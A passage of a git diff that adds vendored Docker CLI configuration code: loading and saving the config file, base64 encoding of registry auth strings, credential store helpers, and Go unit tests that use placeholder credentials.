{ + err = fmt.Errorf("%s - %v", configFile.Filename, err) + } + return &configFile, err + } else if !os.IsNotExist(err) { + // if file is there but we can't stat it for any reason other + // than it doesn't exist then stop + return &configFile, fmt.Errorf("%s - %v", configFile.Filename, err) + } + + // Can't find latest config file so check for the old one + confFile := filepath.Join(homedir.Get(), oldConfigfile) + if _, err := os.Stat(confFile); err != nil { + return &configFile, nil //missing file is not an error + } + file, err := os.Open(confFile) + if err != nil { + return &configFile, fmt.Errorf("%s - %v", confFile, err) + } + defer file.Close() + err = configFile.LegacyLoadFromReader(file) + if err != nil { + return &configFile, fmt.Errorf("%s - %v", confFile, err) + } + + if configFile.HTTPHeaders == nil { + configFile.HTTPHeaders = map[string]string{} + } + return &configFile, nil +} diff --git a/vendor/github.com/docker/docker/cliconfig/config_test.go b/vendor/github.com/docker/docker/cliconfig/config_test.go new file mode 100644 index 0000000000..d8a099ab58 --- /dev/null +++ b/vendor/github.com/docker/docker/cliconfig/config_test.go @@ -0,0 +1,621 @@ +package cliconfig + +import ( + "io/ioutil" + "os" + "path/filepath" + "strings" + "testing" + + "github.com/docker/docker/cliconfig/configfile" + "github.com/docker/docker/pkg/homedir" +) + +func TestEmptyConfigDir(t *testing.T) { + tmpHome, err := ioutil.TempDir("", "config-test") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tmpHome) + + SetConfigDir(tmpHome) + + config, err := Load("") + if err != nil { + t.Fatalf("Failed loading on empty config dir: %q", err) + } + + expectedConfigFilename := filepath.Join(tmpHome, ConfigFileName) + if config.Filename != expectedConfigFilename { + t.Fatalf("Expected config filename %s, got %s", expectedConfigFilename, config.Filename) + } + + // Now save it and make sure it shows up in new form + saveConfigAndValidateNewFormat(t, config, tmpHome) +} + +func TestMissingFile(t *testing.T) { + tmpHome, err := ioutil.TempDir("", "config-test") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tmpHome) + + config, err := Load(tmpHome) + if err != nil { + t.Fatalf("Failed loading on missing file: %q", err) + } + + // Now save it and make sure it shows up in new form + saveConfigAndValidateNewFormat(t, config, tmpHome) +} + +func TestSaveFileToDirs(t *testing.T) { + tmpHome, err := ioutil.TempDir("", "config-test") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tmpHome) + + tmpHome += "/.docker" + + config, err := Load(tmpHome) + if err != nil { + t.Fatalf("Failed loading on missing file: %q", err) + } + + // Now save it and make sure it shows up in new form + saveConfigAndValidateNewFormat(t, config, tmpHome) +} + +func TestEmptyFile(t *testing.T) { + tmpHome, err := ioutil.TempDir("", "config-test") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tmpHome) + + fn := filepath.Join(tmpHome, ConfigFileName) + if err := ioutil.WriteFile(fn, []byte(""), 0600); err != nil { + t.Fatal(err) + } + + _, err = Load(tmpHome) + if err == nil { + t.Fatalf("Was supposed to fail") + } +} + +func TestEmptyJSON(t *testing.T) { + tmpHome, err := ioutil.TempDir("", "config-test") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tmpHome) + + fn := filepath.Join(tmpHome, ConfigFileName) + if err := ioutil.WriteFile(fn, []byte("{}"), 0600); err != nil { + t.Fatal(err) + } + + config, err := Load(tmpHome) + if err != nil { + t.Fatalf("Failed loading on empty json file: %q", err) + } + + // Now save it and make sure it shows up in new form + saveConfigAndValidateNewFormat(t, config, tmpHome) +} + +func TestOldInvalidsAuth(t *testing.T) { + invalids := map[string]string{ + `username = test`: "The Auth config file is empty", + `username +password`: "Invalid Auth config file", + `username = test +email`: "Invalid auth configuration file", + } + + tmpHome, err := ioutil.TempDir("", "config-test") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tmpHome) + + homeKey := homedir.Key() + homeVal := homedir.Get() + + defer func() { os.Setenv(homeKey, homeVal) }() + os.Setenv(homeKey, tmpHome) + + for content, expectedError := range invalids { + fn := filepath.Join(tmpHome, oldConfigfile) + if err := ioutil.WriteFile(fn, []byte(content), 0600); err != nil { + t.Fatal(err) + } + + config, err := Load(tmpHome) + // Use Contains instead of == since the file name will change each time + if err == nil || !strings.Contains(err.Error(), expectedError) { + t.Fatalf("Should have failed\nConfig: %v\nGot: %v\nExpected: %v", config, err, expectedError) + } + + } +} + +func TestOldValidAuth(t *testing.T) { + tmpHome, err := ioutil.TempDir("", "config-test") + if err != nil { + t.Fatal(err) + } + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tmpHome) + + homeKey := homedir.Key() + homeVal := homedir.Get() + + defer func() { os.Setenv(homeKey, homeVal) }() + os.Setenv(homeKey, tmpHome) + + fn := filepath.Join(tmpHome, oldConfigfile) + js := `username = am9lam9lOmhlbGxv + email = user@example.com` + if err := ioutil.WriteFile(fn, []byte(js), 0600); err != nil { + t.Fatal(err) + } + + config, err := Load(tmpHome) + if err != nil { + t.Fatal(err) + } + + // defaultIndexserver is https://index.docker.io/v1/ + ac := config.AuthConfigs["https://index.docker.io/v1/"] + if ac.Username != "joejoe" || ac.Password != "hello" { + t.Fatalf("Missing data from parsing:\n%q", config) + } + + // Now save it and make sure it shows up in new form + configStr := saveConfigAndValidateNewFormat(t, config, tmpHome) + + expConfStr := `{ + "auths": { + "https://index.docker.io/v1/": { + "auth": "am9lam9lOmhlbGxv" + } + } +}` + + if configStr != expConfStr { + t.Fatalf("Should have save in new form: \n%s\n not \n%s", configStr, expConfStr) + } +} + +func TestOldJSONInvalid(t *testing.T) { + tmpHome, err := ioutil.TempDir("", "config-test") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tmpHome) + + homeKey := homedir.Key() + homeVal := homedir.Get() + + defer func() { os.Setenv(homeKey, homeVal) }() + os.Setenv(homeKey, tmpHome) + + fn := filepath.Join(tmpHome, oldConfigfile) + js := `{"https://index.docker.io/v1/":{"auth":"test","email":"user@example.com"}}` + if err := ioutil.WriteFile(fn, []byte(js), 0600); err != nil { + t.Fatal(err) + } + + config, err := Load(tmpHome) + // Use Contains instead of == since the file name will change each time + if err == nil || !strings.Contains(err.Error(), "Invalid auth configuration file") { + t.Fatalf("Expected an error got : %v, %v", config, err) + } +} + +func TestOldJSON(t *testing.T) { + tmpHome, err := ioutil.TempDir("", "config-test") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tmpHome) + + homeKey := homedir.Key() + homeVal := homedir.Get() + + defer func() { os.Setenv(homeKey, homeVal) }() + os.Setenv(homeKey, tmpHome) + + fn := filepath.Join(tmpHome, oldConfigfile) + js := `{"https://index.docker.io/v1/":{"auth":"am9lam9lOmhlbGxv","email":"user@example.com"}}` + if err := ioutil.WriteFile(fn, []byte(js), 0600); err != nil { + t.Fatal(err) + } + + config, err := Load(tmpHome) + if err != nil { + t.Fatalf("Failed loading on empty json file: %q", err) + } + + ac := config.AuthConfigs["https://index.docker.io/v1/"] + if ac.Username != "joejoe" || ac.Password != "hello" { + t.Fatalf("Missing data from parsing:\n%q", config) + } + + // Now save it and make sure it shows up in new form + configStr := saveConfigAndValidateNewFormat(t, config, tmpHome) + + expConfStr := `{ + "auths": { + "https://index.docker.io/v1/": { + "auth": "am9lam9lOmhlbGxv", + "email": "user@example.com" + } + } +}` + + if configStr != expConfStr { + t.Fatalf("Should have save in new form: \n'%s'\n not \n'%s'\n", configStr, expConfStr) + } +} + +func TestNewJSON(t *testing.T) { + tmpHome, err := ioutil.TempDir("", "config-test") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tmpHome) + + fn := filepath.Join(tmpHome, ConfigFileName) + js := ` { "auths": { "https://index.docker.io/v1/": { "auth": "am9lam9lOmhlbGxv" } } }` + if err := ioutil.WriteFile(fn, []byte(js), 0600); err != nil { + t.Fatal(err) + } + + config, err := Load(tmpHome) + if err != nil { + t.Fatalf("Failed loading on empty json file: %q", err) + } + + ac := config.AuthConfigs["https://index.docker.io/v1/"] + if ac.Username != "joejoe" || ac.Password != "hello" { + t.Fatalf("Missing data from parsing:\n%q", config) + } + + // Now save it and make sure it shows up in new form + configStr := saveConfigAndValidateNewFormat(t, config, tmpHome) + + expConfStr := `{ + "auths": { + "https://index.docker.io/v1/": { + "auth": "am9lam9lOmhlbGxv" + } + } +}` + + if configStr != expConfStr { + t.Fatalf("Should have save in new form: \n%s\n not \n%s", configStr, expConfStr) + } +} + +func TestNewJSONNoEmail(t *testing.T) { + tmpHome, err := ioutil.TempDir("", "config-test") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tmpHome) + + fn := filepath.Join(tmpHome, ConfigFileName) + js := ` { "auths": { "https://index.docker.io/v1/": { "auth": "am9lam9lOmhlbGxv" } } }` + if err := ioutil.WriteFile(fn, []byte(js), 0600); err != nil { + t.Fatal(err) + } + + config, err := Load(tmpHome) + if err != nil { + t.Fatalf("Failed loading on empty json file: %q", err) + } + + ac := config.AuthConfigs["https://index.docker.io/v1/"] + if ac.Username != "joejoe" || ac.Password != "hello" { + t.Fatalf("Missing data from parsing:\n%q", config) + } + + // Now save it and make sure it shows up in new form + configStr := saveConfigAndValidateNewFormat(t, config, tmpHome) + + expConfStr := `{ + "auths": { + "https://index.docker.io/v1/": { + "auth": "am9lam9lOmhlbGxv" + } + } +}` + + if configStr != expConfStr { + t.Fatalf("Should have save in new form: \n%s\n not \n%s", configStr, expConfStr) + } +} + +func TestJSONWithPsFormat(t *testing.T) { + tmpHome, err := ioutil.TempDir("", "config-test") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tmpHome) + + fn := filepath.Join(tmpHome, ConfigFileName) + js := `{ + "auths": { "https://index.docker.io/v1/": { "auth": "am9lam9lOmhlbGxv", "email": "user@example.com" } }, + "psFormat": "table {{.ID}}\\t{{.Label \"com.docker.label.cpu\"}}" +}` + if err := ioutil.WriteFile(fn, []byte(js), 0600); err != nil { + t.Fatal(err) + } + + config, err := Load(tmpHome) + if err != nil { + t.Fatalf("Failed loading on empty json file: %q", err) + } + + if config.PsFormat != `table {{.ID}}\t{{.Label "com.docker.label.cpu"}}` { + t.Fatalf("Unknown ps format: %s\n", config.PsFormat) + } + + // Now save it and make sure it shows up in new form + configStr := saveConfigAndValidateNewFormat(t, config, tmpHome) + if !strings.Contains(configStr, `"psFormat":`) || + !strings.Contains(configStr, "{{.ID}}") { + t.Fatalf("Should have save in new form: %s", configStr) + } +} + +func TestJSONWithCredentialStore(t *testing.T) { + tmpHome, err := ioutil.TempDir("", "config-test") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tmpHome) + + fn := filepath.Join(tmpHome, ConfigFileName) + js := `{ + "auths": { "https://index.docker.io/v1/": { "auth": "am9lam9lOmhlbGxv", "email": "user@example.com" } }, + "credsStore": "crazy-secure-storage" +}` + if err := ioutil.WriteFile(fn, []byte(js), 0600); err != nil { + t.Fatal(err) + } + + config, err := Load(tmpHome) + if err != nil { + t.Fatalf("Failed loading on empty json file: %q", err) + } + + if config.CredentialsStore != "crazy-secure-storage" { + t.Fatalf("Unknown credential store: %s\n", config.CredentialsStore) + } + + // Now save it and make sure it shows up in new form + configStr := saveConfigAndValidateNewFormat(t, config, tmpHome) + if !strings.Contains(configStr, `"credsStore":`) || + !strings.Contains(configStr, "crazy-secure-storage") { + t.Fatalf("Should have save in new form: %s", configStr) + } +} + +func TestJSONWithCredentialHelpers(t *testing.T) { + tmpHome, err := ioutil.TempDir("", "config-test") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tmpHome) + + fn := filepath.Join(tmpHome, ConfigFileName) + js := `{ + "auths": { "https://index.docker.io/v1/": { "auth": "am9lam9lOmhlbGxv", "email": "user@example.com" } }, + "credHelpers": { "images.io": "images-io", "containers.com": "crazy-secure-storage" } +}` + if err := ioutil.WriteFile(fn, []byte(js), 0600); err != nil { + t.Fatal(err) + } + + config, err := Load(tmpHome) + if err != nil { + t.Fatalf("Failed loading on empty json file: %q", err) + } + + if config.CredentialHelpers == nil { + t.Fatal("config.CredentialHelpers was nil") + } else if config.CredentialHelpers["images.io"] != "images-io" || + config.CredentialHelpers["containers.com"] != "crazy-secure-storage" { + t.Fatalf("Credential helpers not deserialized properly: %v\n", config.CredentialHelpers) + } + + // Now save it and make sure it shows up in new form + configStr := saveConfigAndValidateNewFormat(t, config, tmpHome) + if !strings.Contains(configStr, `"credHelpers":`) || + !strings.Contains(configStr, "images.io") || + !strings.Contains(configStr, "images-io") || + !strings.Contains(configStr, "containers.com") || + !strings.Contains(configStr, "crazy-secure-storage") { + t.Fatalf("Should have save in new form: %s", configStr) + } +} + +// Save it and make sure it shows up in new form +func saveConfigAndValidateNewFormat(t *testing.T, config *configfile.ConfigFile, homeFolder string) string { + if err := config.Save(); err != nil { + t.Fatalf("Failed to save: %q", err) + } + + buf, err := ioutil.ReadFile(filepath.Join(homeFolder, ConfigFileName)) + if err != nil { + t.Fatal(err) + } + if !strings.Contains(string(buf), `"auths":`) { + t.Fatalf("Should have save in new form: %s", string(buf)) + } + return string(buf) +} + +func TestConfigDir(t *testing.T) { + tmpHome, err := ioutil.TempDir("", "config-test") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tmpHome) + + if ConfigDir() == tmpHome { + t.Fatalf("Expected ConfigDir to be different than %s by default, but was the same", tmpHome) + } + + // Update configDir + SetConfigDir(tmpHome) + + if ConfigDir() != tmpHome { + t.Fatalf("Expected ConfigDir to %s, but was %s", tmpHome, ConfigDir()) + } +} + +func TestConfigFile(t *testing.T) { + configFilename := "configFilename" + configFile := NewConfigFile(configFilename) + + if configFile.Filename != configFilename { + t.Fatalf("Expected %s, got %s", configFilename, configFile.Filename) + } +} + +func TestJSONReaderNoFile(t *testing.T) { + js := ` { "auths": { "https://index.docker.io/v1/": { "auth": "am9lam9lOmhlbGxv", "email": "user@example.com" } } }` + + config, err := LoadFromReader(strings.NewReader(js)) + if err != nil { + t.Fatalf("Failed loading on empty json file: %q", err) + } + + ac := config.AuthConfigs["https://index.docker.io/v1/"] + if ac.Username != "joejoe" || ac.Password != "hello" { + t.Fatalf("Missing data from parsing:\n%q", config) + } + +} + +func TestOldJSONReaderNoFile(t *testing.T) { + js := `{"https://index.docker.io/v1/":{"auth":"am9lam9lOmhlbGxv","email":"user@example.com"}}` + + config, err := LegacyLoadFromReader(strings.NewReader(js)) + if err != nil { + t.Fatalf("Failed loading on empty json file: %q", err) + } + + ac := config.AuthConfigs["https://index.docker.io/v1/"] + if ac.Username != "joejoe" || ac.Password != "hello" { + t.Fatalf("Missing data from parsing:\n%q", config) + } +} + +func TestJSONWithPsFormatNoFile(t *testing.T) { + js := `{ + "auths": { "https://index.docker.io/v1/": { "auth": "am9lam9lOmhlbGxv", "email": "user@example.com" } }, + "psFormat": "table {{.ID}}\\t{{.Label \"com.docker.label.cpu\"}}" +}` + config, err := LoadFromReader(strings.NewReader(js)) + if err != nil { + t.Fatalf("Failed loading on empty json file: %q", err) + } + + if config.PsFormat != `table {{.ID}}\t{{.Label "com.docker.label.cpu"}}` { + t.Fatalf("Unknown ps format: %s\n", config.PsFormat) + } + +} + +func TestJSONSaveWithNoFile(t *testing.T) { + js := `{ + "auths": { "https://index.docker.io/v1/": { "auth": "am9lam9lOmhlbGxv" } }, + "psFormat": "table {{.ID}}\\t{{.Label \"com.docker.label.cpu\"}}" +}` + config, err := LoadFromReader(strings.NewReader(js)) + err = config.Save() + if err == nil { + t.Fatalf("Expected error. File should not have been able to save with no file name.") + } + + tmpHome, err := ioutil.TempDir("", "config-test") + if err != nil { + t.Fatalf("Failed to create a temp dir: %q", err) + } + defer os.RemoveAll(tmpHome) + + fn := filepath.Join(tmpHome, ConfigFileName) + f, _ := os.OpenFile(fn, os.O_WRONLY|os.O_CREATE|os.O_TRUNC, 0600) + defer f.Close() + + err = config.SaveToWriter(f) + if err != nil { + t.Fatalf("Failed saving to file: %q", err) + } + buf, err := ioutil.ReadFile(filepath.Join(tmpHome, ConfigFileName)) + if err != nil { + t.Fatal(err) + } + expConfStr := `{ + "auths": { + "https://index.docker.io/v1/": { + "auth": "am9lam9lOmhlbGxv" + } + }, + "psFormat": "table {{.ID}}\\t{{.Label \"com.docker.label.cpu\"}}" +}` + if string(buf) != expConfStr { + t.Fatalf("Should have save in new form: \n%s\nnot \n%s", string(buf), expConfStr) + } +} + +func TestLegacyJSONSaveWithNoFile(t *testing.T) { + + js := `{"https://index.docker.io/v1/":{"auth":"am9lam9lOmhlbGxv","email":"user@example.com"}}` + config, err := LegacyLoadFromReader(strings.NewReader(js)) + err = config.Save() + if err == nil { + t.Fatalf("Expected error. File should not have been able to save with no file name.") + } + + tmpHome, err := ioutil.TempDir("", "config-test") + if err != nil { + t.Fatalf("Failed to create a temp dir: %q", err) + } + defer os.RemoveAll(tmpHome) + + fn := filepath.Join(tmpHome, ConfigFileName) + f, _ := os.OpenFile(fn, os.O_WRONLY|os.O_CREATE|os.O_TRUNC, 0600) + defer f.Close() + + if err = config.SaveToWriter(f); err != nil { + t.Fatalf("Failed saving to file: %q", err) + } + buf, err := ioutil.ReadFile(filepath.Join(tmpHome, ConfigFileName)) + if err != nil { + t.Fatal(err) + } + + expConfStr := `{ + "auths": { + "https://index.docker.io/v1/": { + "auth": "am9lam9lOmhlbGxv", + "email": "user@example.com" + } + } +}` + + if string(buf) != expConfStr { + t.Fatalf("Should have save in new form: \n%s\n not \n%s", string(buf), expConfStr) + } +} diff --git a/vendor/github.com/docker/docker/cliconfig/configfile/file.go b/vendor/github.com/docker/docker/cliconfig/configfile/file.go new file mode 100644 index 0000000000..39097133a4 --- /dev/null +++ b/vendor/github.com/docker/docker/cliconfig/configfile/file.go @@ -0,0 +1,183 @@ +package configfile + +import ( + "encoding/base64" + "encoding/json" + "fmt" + "io" + "io/ioutil" + "os" + "path/filepath" + "strings" + + "github.com/docker/docker/api/types" +) + +const ( + // This constant is only used for really old config files when the + // URL wasn't saved as part of the config file and it was just + // assumed to be this value. + defaultIndexserver = "https://index.docker.io/v1/" +) + +// ConfigFile ~/.docker/config.json file info +type ConfigFile struct { + AuthConfigs map[string]types.AuthConfig `json:"auths"` + HTTPHeaders map[string]string `json:"HttpHeaders,omitempty"` + PsFormat string `json:"psFormat,omitempty"` + ImagesFormat string `json:"imagesFormat,omitempty"` + NetworksFormat string `json:"networksFormat,omitempty"` + VolumesFormat string `json:"volumesFormat,omitempty"` + StatsFormat string `json:"statsFormat,omitempty"` + DetachKeys string `json:"detachKeys,omitempty"` + CredentialsStore string `json:"credsStore,omitempty"` + CredentialHelpers map[string]string `json:"credHelpers,omitempty"` + Filename string `json:"-"` // Note: for internal use only + ServiceInspectFormat string `json:"serviceInspectFormat,omitempty"` +} + +// LegacyLoadFromReader reads the non-nested configuration data given and sets up the +// auth config information with given directory and populates the receiver object +func (configFile *ConfigFile) LegacyLoadFromReader(configData io.Reader) error { + b, err := ioutil.ReadAll(configData) + if err != nil { + return err + } + + if err := json.Unmarshal(b, &configFile.AuthConfigs); err != nil { + arr := strings.Split(string(b), "\n") + if len(arr) < 2 { + return fmt.Errorf("The Auth config file is empty") + } + authConfig := types.AuthConfig{} + origAuth := strings.Split(arr[0], " = ") + if len(origAuth) != 2 { + return fmt.Errorf("Invalid Auth config file") + } + authConfig.Username, authConfig.Password, err = decodeAuth(origAuth[1]) + if err != nil { + return err + } + authConfig.ServerAddress = defaultIndexserver + configFile.AuthConfigs[defaultIndexserver] = authConfig + } else { + for k, authConfig := range configFile.AuthConfigs { + authConfig.Username, authConfig.Password, err = decodeAuth(authConfig.Auth) + if err != nil { + return err + } + authConfig.Auth = "" + authConfig.ServerAddress = k + configFile.AuthConfigs[k] = authConfig + } + } + return nil +} + +// LoadFromReader reads the configuration data given and sets up the auth config +// information with given directory and populates the receiver object +func (configFile *ConfigFile) LoadFromReader(configData io.Reader) error { + if err := json.NewDecoder(configData).Decode(&configFile); err != nil { + return err + } + var err error + for addr, ac := range configFile.AuthConfigs { + ac.Username, ac.Password, err = decodeAuth(ac.Auth) + if err != nil { + return err + } + ac.Auth = "" + ac.ServerAddress = addr + configFile.AuthConfigs[addr] = ac + } + return nil +} + +// ContainsAuth returns whether there is authentication configured +// in this file or not. +func (configFile *ConfigFile) ContainsAuth() bool { + return configFile.CredentialsStore != "" || + len(configFile.CredentialHelpers) > 0 || + len(configFile.AuthConfigs) > 0 +} + +// SaveToWriter encodes and writes out all the authorization information to +// the given writer +func (configFile *ConfigFile) SaveToWriter(writer io.Writer) error { + // Encode sensitive data into a new/temp struct + tmpAuthConfigs := make(map[string]types.AuthConfig, len(configFile.AuthConfigs)) + for k, authConfig := range configFile.AuthConfigs { + authCopy := authConfig + // encode and save the authstring, while blanking out the original fields + authCopy.Auth = encodeAuth(&authCopy) + authCopy.Username = "" + authCopy.Password = "" + authCopy.ServerAddress = "" + tmpAuthConfigs[k] = authCopy + } + + saveAuthConfigs := configFile.AuthConfigs + configFile.AuthConfigs = tmpAuthConfigs + defer func() { configFile.AuthConfigs = saveAuthConfigs }() + + data, err := json.MarshalIndent(configFile, "", "\t") + if err != nil { + return err + } + _, err = writer.Write(data) + return err +} + +// Save encodes and writes out all the authorization information +func (configFile *ConfigFile) Save() error { + if configFile.Filename == "" { + return fmt.Errorf("Can't save config with empty filename") + } + + if err := os.MkdirAll(filepath.Dir(configFile.Filename), 0700); err != nil { + return err + } + f, err := os.OpenFile(configFile.Filename, os.O_WRONLY|os.O_CREATE|os.O_TRUNC, 0600) + if err != nil { + return err + } + defer f.Close() + return configFile.SaveToWriter(f) +} + +// encodeAuth creates a base64 encoded string to containing authorization information +func encodeAuth(authConfig *types.AuthConfig) string { + if authConfig.Username == "" && authConfig.Password == "" { + return "" + } + + authStr := authConfig.Username + ":" + authConfig.Password + msg := []byte(authStr) + encoded := make([]byte, base64.StdEncoding.EncodedLen(len(msg))) + base64.StdEncoding.Encode(encoded, msg) + return string(encoded) +} + +// decodeAuth decodes a base64 encoded string and returns username and password +func decodeAuth(authStr string) (string, string, error) { + if authStr == "" { + return "", "", nil + } + + decLen := base64.StdEncoding.DecodedLen(len(authStr)) + decoded := make([]byte, decLen) + authByte := []byte(authStr) + n, err := base64.StdEncoding.Decode(decoded, authByte) + if err != nil { + return "", "", err + } + if n > decLen { + return "", "", fmt.Errorf("Something went wrong decoding auth config") + } + arr := strings.SplitN(string(decoded), ":", 2) + if len(arr) != 2 { + return "", "", fmt.Errorf("Invalid auth configuration file") + } + password := strings.Trim(arr[1], "\x00") + return arr[0], password, nil +} diff --git a/vendor/github.com/docker/docker/cliconfig/configfile/file_test.go b/vendor/github.com/docker/docker/cliconfig/configfile/file_test.go new file mode 100644 index 0000000000..435797f681 --- /dev/null +++ b/vendor/github.com/docker/docker/cliconfig/configfile/file_test.go @@ -0,0 +1,27 @@ +package configfile + +import ( + "testing" + + "github.com/docker/docker/api/types" +) + +func TestEncodeAuth(t *testing.T) { + newAuthConfig := &types.AuthConfig{Username: "ken", Password: "test"} + authStr := encodeAuth(newAuthConfig) + decAuthConfig := &types.AuthConfig{} + var err error + decAuthConfig.Username, decAuthConfig.Password, err = decodeAuth(authStr) + if err != nil { + t.Fatal(err) + } + if newAuthConfig.Username != decAuthConfig.Username { + t.Fatal("Encode Username doesn't match decoded Username") + } + if newAuthConfig.Password != decAuthConfig.Password { + t.Fatal("Encode Password doesn't match decoded Password") + } + if authStr != "a2VuOnRlc3Q=" { + t.Fatal("AuthString encoding isn't correct.") + } +} diff --git a/vendor/github.com/docker/docker/cliconfig/credentials/credentials.go b/vendor/github.com/docker/docker/cliconfig/credentials/credentials.go new file mode 100644 index 0000000000..ca874cac51 --- /dev/null +++ b/vendor/github.com/docker/docker/cliconfig/credentials/credentials.go @@ -0,0 +1,17 @@ +package credentials + +import ( + "github.com/docker/docker/api/types" +) + +// Store is the interface that any credentials store must implement. +type Store interface { + // Erase removes credentials from the store for a given server. + Erase(serverAddress string) error + // Get retrieves credentials from the store for a given server. + Get(serverAddress string) (types.AuthConfig, error) + // GetAll retrieves all the credentials from the store. + GetAll() (map[string]types.AuthConfig, error) + // Store saves credentials in the store. + Store(authConfig types.AuthConfig) error +} diff --git a/vendor/github.com/docker/docker/cliconfig/credentials/default_store.go b/vendor/github.com/docker/docker/cliconfig/credentials/default_store.go new file mode 100644 index 0000000000..b4733709b1 --- /dev/null +++ b/vendor/github.com/docker/docker/cliconfig/credentials/default_store.go @@ -0,0 +1,22 @@ +package credentials + +import ( + "os/exec" + + "github.com/docker/docker/cliconfig/configfile" +) + +// DetectDefaultStore sets the default credentials store +// if the host includes the default store helper program. +func DetectDefaultStore(c *configfile.ConfigFile) { + if c.CredentialsStore != "" { + // user defined + return + } + + if defaultCredentialsStore != "" { + if _, err := exec.LookPath(remoteCredentialsPrefix + defaultCredentialsStore); err == nil { + c.CredentialsStore = defaultCredentialsStore + } + } +} diff --git a/vendor/github.com/docker/docker/cliconfig/credentials/default_store_darwin.go b/vendor/github.com/docker/docker/cliconfig/credentials/default_store_darwin.go new file mode 100644 index 0000000000..63e8ed4010 --- /dev/null +++ b/vendor/github.com/docker/docker/cliconfig/credentials/default_store_darwin.go @@ -0,0 +1,3 @@ +package credentials + +const defaultCredentialsStore = "osxkeychain" diff --git a/vendor/github.com/docker/docker/cliconfig/credentials/default_store_linux.go b/vendor/github.com/docker/docker/cliconfig/credentials/default_store_linux.go new file mode 100644 index 0000000000..864c540f6c --- /dev/null +++ b/vendor/github.com/docker/docker/cliconfig/credentials/default_store_linux.go @@ -0,0 +1,3 @@ +package credentials + +const defaultCredentialsStore = "secretservice" diff --git a/vendor/github.com/docker/docker/cliconfig/credentials/default_store_unsupported.go b/vendor/github.com/docker/docker/cliconfig/credentials/default_store_unsupported.go new file mode 100644 index 0000000000..519ef53dcd --- /dev/null +++ b/vendor/github.com/docker/docker/cliconfig/credentials/default_store_unsupported.go @@ -0,0 +1,5 @@ +// +build !windows,!darwin,!linux + +package credentials + +const defaultCredentialsStore = "" diff --git a/vendor/github.com/docker/docker/cliconfig/credentials/default_store_windows.go b/vendor/github.com/docker/docker/cliconfig/credentials/default_store_windows.go new file mode 100644 index 0000000000..fb6a9745cf --- /dev/null +++ b/vendor/github.com/docker/docker/cliconfig/credentials/default_store_windows.go @@ -0,0 +1,3 @@ +package credentials + +const defaultCredentialsStore = "wincred" diff --git a/vendor/github.com/docker/docker/cliconfig/credentials/file_store.go b/vendor/github.com/docker/docker/cliconfig/credentials/file_store.go new file mode 100644 index 0000000000..ca73a384d4 --- /dev/null +++ b/vendor/github.com/docker/docker/cliconfig/credentials/file_store.go @@ -0,0 +1,53 @@ +package credentials + +import ( + "github.com/docker/docker/api/types" + "github.com/docker/docker/cliconfig/configfile" + "github.com/docker/docker/registry" +) + +// fileStore implements a credentials store using +// the docker configuration file to keep the credentials in plain text. +type fileStore struct { + file *configfile.ConfigFile +} + +// NewFileStore creates a new file credentials store. +func NewFileStore(file *configfile.ConfigFile) Store { + return &fileStore{ + file: file, + } +} + +// Erase removes the given credentials from the file store. +func (c *fileStore) Erase(serverAddress string) error { + delete(c.file.AuthConfigs, serverAddress) + return c.file.Save() +} + +// Get retrieves credentials for a specific server from the file store. +func (c *fileStore) Get(serverAddress string) (types.AuthConfig, error) { + authConfig, ok := c.file.AuthConfigs[serverAddress] + if !ok { + // Maybe they have a legacy config file, we will iterate the keys converting + // them to the new format and testing + for r, ac := range c.file.AuthConfigs { + if serverAddress == registry.ConvertToHostname(r) { + return ac, nil + } + } + + authConfig = types.AuthConfig{} + } + return authConfig, nil +} + +func (c *fileStore) GetAll() (map[string]types.AuthConfig, error) { + return c.file.AuthConfigs, nil +} + +// Store saves the given credentials in the file store. +func (c *fileStore) Store(authConfig types.AuthConfig) error { + c.file.AuthConfigs[authConfig.ServerAddress] = authConfig + return c.file.Save() +} diff --git a/vendor/github.com/docker/docker/cliconfig/credentials/file_store_test.go b/vendor/github.com/docker/docker/cliconfig/credentials/file_store_test.go new file mode 100644 index 0000000000..efed4e9040 --- /dev/null +++ b/vendor/github.com/docker/docker/cliconfig/credentials/file_store_test.go @@ -0,0 +1,139 @@ +package credentials + +import ( + "io/ioutil" + "testing" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/cliconfig" + "github.com/docker/docker/cliconfig/configfile" +) + +func newConfigFile(auths map[string]types.AuthConfig) *configfile.ConfigFile { + tmp, _ := ioutil.TempFile("", "docker-test") + name := tmp.Name() + tmp.Close() + + c := cliconfig.NewConfigFile(name) + c.AuthConfigs = auths + return c +} + +func TestFileStoreAddCredentials(t *testing.T) { + f := newConfigFile(make(map[string]types.AuthConfig)) + + s := NewFileStore(f) + err := s.Store(types.AuthConfig{ + Auth: "super_secret_token", + Email: "foo@example.com", + ServerAddress: "https://example.com", + }) + + if err != nil { + t.Fatal(err) + } + + if len(f.AuthConfigs) != 1 { + t.Fatalf("expected 1 auth config, got %d", len(f.AuthConfigs)) + } + + a, ok := f.AuthConfigs["https://example.com"] + if !ok { + t.Fatalf("expected auth for https://example.com, got %v", f.AuthConfigs) + } + if a.Auth != "super_secret_token" { + t.Fatalf("expected auth `super_secret_token`, got %s", a.Auth) + } + if a.Email != "foo@example.com" { + t.Fatalf("expected email `foo@example.com`, got %s", a.Email) + } +} + +func TestFileStoreGet(t *testing.T) { + f := newConfigFile(map[string]types.AuthConfig{ + "https://example.com": { + Auth: "super_secret_token", + Email: "foo@example.com", + ServerAddress: "https://example.com", + }, + }) + + s := NewFileStore(f) + a, err := s.Get("https://example.com") + if err != nil { + t.Fatal(err) + } + if a.Auth != "super_secret_token" { + t.Fatalf("expected auth `super_secret_token`, got %s", a.Auth) + } + if a.Email != "foo@example.com" { + t.Fatalf("expected email `foo@example.com`, got %s", a.Email) + } +} + +func TestFileStoreGetAll(t *testing.T) { + s1 := "https://example.com" + s2 := "https://example2.com" + f := newConfigFile(map[string]types.AuthConfig{ + 